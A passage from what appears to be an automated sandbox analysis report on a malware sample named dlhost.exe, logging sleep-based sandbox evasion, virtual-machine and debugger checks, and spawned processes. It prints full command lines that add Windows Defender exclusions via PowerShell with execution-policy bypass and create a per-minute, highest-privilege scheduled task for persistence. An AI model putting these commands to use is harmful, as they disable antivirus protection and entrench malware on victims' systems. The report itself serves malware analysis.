                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\dlhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\dlhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\dlhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\dlhost.exeWindow / User API: threadDelayed 7483Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeWindow / User API: threadDelayed 2340Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6528Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3272Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8712Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 909Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6276Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3257Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -599654s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -599438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -599313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -599188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -599078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -598959s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -598828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -598719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -598609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -598500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -598391s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -598281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -598172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -598063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -597935s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -597825s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -597719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -597582s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -597453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -597344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -597219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -597110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -596985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -596860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -596735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -596610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -596485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -596360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -596235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -596110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -595985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -595860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -595735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -595610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -595485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -595360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -595236s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -595008s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -594825s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -594719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -594610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -594500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -594391s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -594266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -594141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -594031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exe TID: 3524Thread sleep time: -593922s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888Thread sleep count: 6276 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888Thread sleep count: 3257 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Users\user\dlhost.exe TID: 6768Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\dlhost.exe TID: 6100Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\dlhost.exe TID: 2828Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\dlhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\dlhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\dlhost.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\dlhost.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\dlhost.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599654Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598959Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598828Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598719Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598609Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598500Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598391Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598281Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598172Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598063Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597935Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597825Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597719Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597582Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595236Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595008Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594825Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594719Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594391Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594266Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594141Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594031Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 593922Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\dlhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\dlhost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\dlhost.exeThread delayed: delay time: 922337203685477
                    Source: dlhost.exe.0.drBinary or memory string: vmware
                    Source: dlhost.exe, 00000000.00000002.3311500140.000000001B434000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\dlhost.exeCode function: 0_2_00007FF848F17540 CheckRemoteDebuggerPresent,0_2_00007FF848F17540
                    Source: C:\Users\user\Desktop\dlhost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\dlhost.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\dlhost.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe'
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\dlhost.exe'
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\dlhost.exe'Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe'
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dlhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\dlhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dlhost" /tr "C:\Users\user\dlhost.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeQueries volume information: C:\Users\user\Desktop\dlhost.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
